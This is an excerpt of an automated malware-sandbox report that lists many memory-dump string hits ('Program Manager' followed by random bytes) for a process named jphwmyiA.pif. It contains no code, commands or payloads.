Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTv
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 3h&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<Vz&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTs
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTr
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qL@^*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager(
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`TI&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhi2&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qDkj*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$2y&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP!
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qB0&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`)e
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpfw*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qDtp
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 8P*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@#h*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8\m
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP;
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP9
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qDcY*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPB
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtse&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT!h&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP,
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@Vl&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@ml
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTrg*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlB\|
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q 90&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP1
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8Nt*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@Ei&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPZ
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPW
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP"T*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qfw&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd/`
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPc
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPa
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql>4&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qTjV*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<Nf*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPG
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,zm&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh,^&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,?X*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q}C&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@[T&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPS
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,1~*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0@-&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp<f*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q3s*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP{
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q01p*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql@_
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPy
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4yr*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPbQ&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<FU*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`(\
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPk
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4>^&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qR*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q ]w&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPt
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh'v&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<8{*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPo
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPm
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qPn
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql7
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql5
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qP.Z&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql6
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|mu&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql@
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT~l*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql>
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql;
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<xv
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q {`*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<d?&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0KR*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0`s
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql-
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlS
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$)r&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql_
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qHav*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql[
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$@>&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql\
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qEm&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(Qi
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlC
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0GI&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlN
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qtoQ&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp'O&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4G;&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qX~^*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlr
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qd9R*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,vP*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`;q
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql\|
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qlg
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qle
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qT#n
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qld
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q@NF&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxwV*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<wb
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qli
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q k<&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhLp
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0^~
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q84j&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp#
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(*E&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,w0&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]ql']&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`tr&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qDQ`&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$F{
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0py&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpo_&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qt7e*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|~z*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q8o}
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxDS&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdcl&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh/
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4'\|*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh),&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh7
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdz8&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qdJa
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh!
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q<}i
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhS
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhQ
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q K}*
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhSZ
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|LX*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qp7s*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhX
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qH;g&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qxV7&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|\|\
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh@
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh=
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q`e0&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,hs*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q$Xk&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q,*7&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhH
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhE
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|~*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(X]&
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0he*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q, c*
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhn
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q0bh
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhy
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhw
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\|Ti*
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qpF0&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qh8n&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qha
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q\8Y
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qL:x&
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026325000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q4uS&
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhk
Source: jphwmyiA.pif, 00000014.00000002.3444524206.000000002A5D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhi
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]qhj
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A67F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR]q(Rr
